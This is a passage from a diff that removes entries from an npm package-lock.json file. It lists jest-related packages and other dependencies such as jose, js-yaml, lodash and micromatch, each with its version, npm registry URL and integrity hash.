"babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^5.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runner/node_modules/convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "node_modules/jest-runner/node_modules/jest-haste-map": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.4.1.tgz", - "integrity": "sha512-imTjcgfVVTvg02khXL11NNLTx9ZaofbAWhilrMg/G8dIkp+HYCswhxf0xxJwBkfhWb3e8dwbjuWburvxmcr58w==", - "dev": true, - "dependencies": { - "@jest/types": "^29.4.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "optionalDependencies": { - "fsevents": "^2.3.2" - } - }, - "node_modules/jest-runner/node_modules/jest-regex-util": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.2.0.tgz", - "integrity": "sha512-6yXn0kg2JXzH30cr2NlThF+70iuO/3irbaB4mh5WyqNIvLLP+B6sFdluO1/1RJmslyh/f9osnefECflHvTbwVA==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runner/node_modules/jest-worker": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.4.1.tgz", - "integrity": "sha512-O9doU/S1EBe+yp/mstQ0VpPwpv0Clgn68TkNwGxL6/usX/KUW9Arnn4ag8C3jc6qHcXznhsT5Na1liYzAsuAbQ==", - "dev": true, - "dependencies": { - "@types/node": "*", - "jest-util": "^29.4.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runner/node_modules/p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "dependencies": { - "yocto-queue": "^0.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/jest-runner/node_modules/supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/supports-color?sponsor=1" - } - }, - "node_modules/jest-runner/node_modules/write-file-atomic": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-5.0.0.tgz", - "integrity": "sha512-R7NYMnHSlV42K54lwY9lvW6MnSm1HSJqZL3xiSgi9E7//FYaI74r2G0rd+/X6VAMkHEdzxQaU5HUOXWUz5kA/w==", - "dev": true, - "dependencies": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - }, - "engines": { - "node": "^14.17.0 || ^16.13.0 || >=18.0.0" - } - }, - "node_modules/jest-runtime": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.4.1.tgz", - "integrity": "sha512-UXTMU9uKu2GjYwTtoAw5rn4STxWw/nadOfW7v1sx6LaJYa3V/iymdCLQM6xy3+7C6mY8GfX22vKpgxY171UIoA==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.4.1", - "@jest/fake-timers": "^29.4.1", - "@jest/globals": "^29.4.1", - "@jest/source-map": "^29.2.0", - "@jest/test-result": "^29.4.1", - "@jest/transform": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-mock": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-resolve": "^29.4.1", - "jest-snapshot": "^29.4.1", - "jest-util": "^29.4.1", - "semver": "^7.3.5", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runtime/node_modules/@jest/transform": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.4.1.tgz", - "integrity": "sha512-5w6YJrVAtiAgr0phzKjYd83UPbCXsBRTeYI4BXokv9Er9CcrH9hfXL/crCvP2d2nGOcovPUnlYiLPFLZrkG5Hg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.4.1", - "@jridgewell/trace-mapping": "^0.3.15", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^5.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runtime/node_modules/convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "node_modules/jest-runtime/node_modules/jest-haste-map": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.4.1.tgz", - "integrity": "sha512-imTjcgfVVTvg02khXL11NNLTx9ZaofbAWhilrMg/G8dIkp+HYCswhxf0xxJwBkfhWb3e8dwbjuWburvxmcr58w==", - "dev": true, - "dependencies": { - "@jest/types": "^29.4.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "optionalDependencies": { - "fsevents": "^2.3.2" - } - }, - "node_modules/jest-runtime/node_modules/jest-regex-util": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.2.0.tgz", - "integrity": "sha512-6yXn0kg2JXzH30cr2NlThF+70iuO/3irbaB4mh5WyqNIvLLP+B6sFdluO1/1RJmslyh/f9osnefECflHvTbwVA==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runtime/node_modules/jest-worker": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.4.1.tgz", - "integrity": "sha512-O9doU/S1EBe+yp/mstQ0VpPwpv0Clgn68TkNwGxL6/usX/KUW9Arnn4ag8C3jc6qHcXznhsT5Na1liYzAsuAbQ==", - "dev": true, - "dependencies": { - "@types/node": "*", - "jest-util": "^29.4.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runtime/node_modules/semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "dependencies": { - "lru-cache": "^6.0.0" - }, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-runtime/node_modules/supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/supports-color?sponsor=1" - } - }, - "node_modules/jest-runtime/node_modules/write-file-atomic": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-5.0.0.tgz", - "integrity": "sha512-R7NYMnHSlV42K54lwY9lvW6MnSm1HSJqZL3xiSgi9E7//FYaI74r2G0rd+/X6VAMkHEdzxQaU5HUOXWUz5kA/w==", - "dev": true, - "dependencies": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - }, - "engines": { - "node": "^14.17.0 || ^16.13.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.4.1.tgz", - "integrity": "sha512-l4iV8EjGgQWVz3ee/LR9sULDk2pCkqb71bjvlqn+qp90lFwpnulHj4ZBT8nm1hA1C5wowXLc7MGnw321u0tsYA==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/traverse": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.4.1", - "@jest/transform": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/babel__traverse": "^7.0.6", - "@types/prettier": "^2.1.5", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.4.1", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.4.1", - "jest-get-type": "^29.2.0", - "jest-haste-map": "^29.4.1", - "jest-matcher-utils": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-util": "^29.4.1", - "natural-compare": "^1.4.0", - "pretty-format": "^29.4.1", - "semver": "^7.3.5" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot/node_modules/@jest/transform": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.4.1.tgz", - "integrity": "sha512-5w6YJrVAtiAgr0phzKjYd83UPbCXsBRTeYI4BXokv9Er9CcrH9hfXL/crCvP2d2nGOcovPUnlYiLPFLZrkG5Hg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.4.1", - "@jridgewell/trace-mapping": "^0.3.15", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^5.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot/node_modules/convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "node_modules/jest-snapshot/node_modules/diff-sequences": { - "version": "29.3.1", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.3.1.tgz", - "integrity": "sha512-hlM3QR272NXCi4pq+N4Kok4kOp6EsgOM3ZSpJI7Da3UAs+Ttsi8MRmB6trM/lhyzUxGfOgnpkHtgqm5Q/CTcfQ==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot/node_modules/jest-diff": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.4.1.tgz", - "integrity": "sha512-uazdl2g331iY56CEyfbNA0Ut7Mn2ulAG5vUaEHXycf1L6IPyuImIxSz4F0VYBKi7LYIuxOwTZzK3wh5jHzASMw==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "diff-sequences": "^29.3.1", - "jest-get-type": "^29.2.0", - "pretty-format": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot/node_modules/jest-get-type": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.2.0.tgz", - "integrity": "sha512-uXNJlg8hKFEnDgFsrCjznB+sTxdkuqiCL6zMgA75qEbAJjJYTs9XPrvDctrEig2GDow22T/LvHgO57iJhXB/UA==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot/node_modules/jest-haste-map": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.4.1.tgz", - "integrity": "sha512-imTjcgfVVTvg02khXL11NNLTx9ZaofbAWhilrMg/G8dIkp+HYCswhxf0xxJwBkfhWb3e8dwbjuWburvxmcr58w==", - "dev": true, - "dependencies": { - "@jest/types": "^29.4.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "optionalDependencies": { - "fsevents": "^2.3.2" - } - }, - "node_modules/jest-snapshot/node_modules/jest-regex-util": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.2.0.tgz", - "integrity": "sha512-6yXn0kg2JXzH30cr2NlThF+70iuO/3irbaB4mh5WyqNIvLLP+B6sFdluO1/1RJmslyh/f9osnefECflHvTbwVA==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot/node_modules/jest-worker": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.4.1.tgz", - "integrity": "sha512-O9doU/S1EBe+yp/mstQ0VpPwpv0Clgn68TkNwGxL6/usX/KUW9Arnn4ag8C3jc6qHcXznhsT5Na1liYzAsuAbQ==", - "dev": true, - "dependencies": { - "@types/node": "*", - "jest-util": "^29.4.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot/node_modules/semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "dependencies": { - "lru-cache": "^6.0.0" - }, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-snapshot/node_modules/supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/supports-color?sponsor=1" - } - }, - "node_modules/jest-snapshot/node_modules/write-file-atomic": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-5.0.0.tgz", - "integrity": "sha512-R7NYMnHSlV42K54lwY9lvW6MnSm1HSJqZL3xiSgi9E7//FYaI74r2G0rd+/X6VAMkHEdzxQaU5HUOXWUz5kA/w==", - "dev": true, - "dependencies": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - }, - "engines": { - "node": "^14.17.0 || ^16.13.0 || >=18.0.0" - } - }, - "node_modules/jest-util": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.4.1.tgz", - "integrity": "sha512-bQy9FPGxVutgpN4VRc0hk6w7Hx/m6L53QxpDreTZgJd9gfx/AV2MjyPde9tGyZRINAUrSv57p2inGBu2dRLmkQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.4.1", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.4.1.tgz", - "integrity": "sha512-qNZXcZQdIQx4SfUB/atWnI4/I2HUvhz8ajOSYUu40CSmf9U5emil8EDHgE7M+3j9/pavtk3knlZBDsgFvv/SWw==", - "dev": true, - "dependencies": { - "@jest/types": "^29.4.1", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.2.0", - "leven": "^3.1.0", - "pretty-format": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate/node_modules/camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/jest-validate/node_modules/jest-get-type": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.2.0.tgz", - "integrity": "sha512-uXNJlg8hKFEnDgFsrCjznB+sTxdkuqiCL6zMgA75qEbAJjJYTs9XPrvDctrEig2GDow22T/LvHgO57iJhXB/UA==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-watcher": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.4.1.tgz", - "integrity": "sha512-vFOzflGFs27nU6h8dpnVRER3O2rFtL+VMEwnG0H3KLHcllLsU8y9DchSh0AL/Rg5nN1/wSiQ+P4ByMGpuybaVw==", - "dev": true, - "dependencies": { - "@jest/test-result": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.4.1", - "string-length": "^4.0.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jose": { - "version": "4.15.5", - "resolved": "https://registry.npmjs.org/jose/-/jose-4.15.5.tgz", - "integrity": "sha512-jc7BFxgKPKi94uOvEmzlSWFFe2+vASyXaKUpdQKatWAESU2MWjDfFf0fdfc83CDKcA5QecabZeNLyfhe3yKNkg==", - "optional": true, - "funding": { - "url": "https://github.com/sponsors/panva" - } - }, - "node_modules/js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "node_modules/js-yaml": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.0.tgz", - "integrity": "sha512-wpxZs9NoxZaJESJGIZTyDEaYpl0FKSA+FB9aJiyemKhMwkxQg63h4T1KJgUGHpTqPDNRcmmYLugrRjJlBtWvRA==", - "dependencies": { - "argparse": "^2.0.1" - }, - "bin": { - "js-yaml": "bin/js-yaml.js" - } - }, - "node_modules/jsbn": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", - "integrity": "sha1-peZUwuWi3rXyAdls77yoDA7y9RM=" - }, - "node_modules/jsesc": { - "version": "2.5.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-2.5.2.tgz", - "integrity": "sha512-OYu7XEzjkCQ3C5Ps3QIZsQfNpqoJyZZA99wd9aWd05NCtC5pWOkShK2mkL6HXQR6/Cy2lbNdPlZBpuQHXE63gA==", - "dev": true, - "bin": { - "jsesc": "bin/jsesc" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "node_modules/json-schema": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", - "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" - }, - "node_modules/json-schema-traverse": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", - "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" - }, - "node_modules/json-stringify-safe": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", - "integrity": "sha1-Epai1Y/UXxmg9s4B1lcB4sc1tus=" - }, - "node_modules/json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true, - "bin": { - "json5": "lib/cli.js" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/jsonpath-plus": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-7.2.0.tgz", - "integrity": "sha512-zBfiUPM5nD0YZSBT/o/fbCUlCcepMIdP0CJZxM1+KgA4f2T206f6VAg9e7mX35+KlMaIc5qXW34f3BnwJ3w+RA==", - "engines": { - "node": ">=12.0.0" - } - }, - "node_modules/jsprim": { - "version": "1.4.2", - "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", - "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", - "dependencies": { - "assert-plus": "1.0.0", - "extsprintf": "1.3.0", - "json-schema": "0.4.0", - "verror": "1.10.0" - }, - "engines": { - "node": ">=0.6.0" - } - }, - "node_modules/kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/lines-and-columns": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", - "dev": true - }, - "node_modules/locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "dependencies": { - "p-locate": "^4.1.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/lodash": { - "version": "4.17.21", - "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz", - "integrity": "sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg==" - }, - "node_modules/lodash.memoize": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/lodash.memoize/-/lodash.memoize-4.1.2.tgz", - "integrity": "sha512-t7j+NzmgnQzTAYXcsHYLgimltOV1MXHtlOWf6GjL9Kj8GK5FInw5JotxvbOs+IvV1/Dzo04/fCGfLVs7aXb4Ag==", - "dev": true - }, - "node_modules/lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "devOptional": true, - "dependencies": { - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/make-dir": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-3.1.0.tgz", - "integrity": "sha512-g3FeP20LNwhALb/6Cz6Dd4F2ngze0jz7tbzrD2wAV+o9FeNHe4rL+yK2md0J/fiSf1sa1ADhXqi5+oVwOM/eGw==", - "dev": true, - "dependencies": { - "semver": "^6.0.0" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/make-error": { - "version": "1.3.6", - "resolved": "https://registry.npmjs.org/make-error/-/make-error-1.3.6.tgz", - "integrity": "sha512-s8UhlNe7vPKomQhC1qFelMokr/Sc3AgNbso3n74mVPA5LTZwkB9NlXf4XPamLxJE8h0gh73rM94xvwRT2CVInw==", - "dev": true - }, - "node_modules/makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, - "dependencies": { - "tmpl": "1.0.5" - } - }, - "node_modules/merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "node_modules/micromatch": { - "version": "4.0.4", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.4.tgz", - "integrity": "sha512-pRmzw/XUcwXGpD9aI9q/0XOwLNygjETJ8y0ao0wdqprrzDa4YnxLcz7fQRZr8voh8V10kGhABbNcHVk5wHgWwg==", - "dev": true, - "dependencies": { - "braces": "^3.0.1", - "picomatch": "^2.2.3" - }, - "engines": { - "node": ">=8.6" - } - }, - "node_modules/mime-db": { - "version": "1.49.0", - "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.49.0.tgz", - 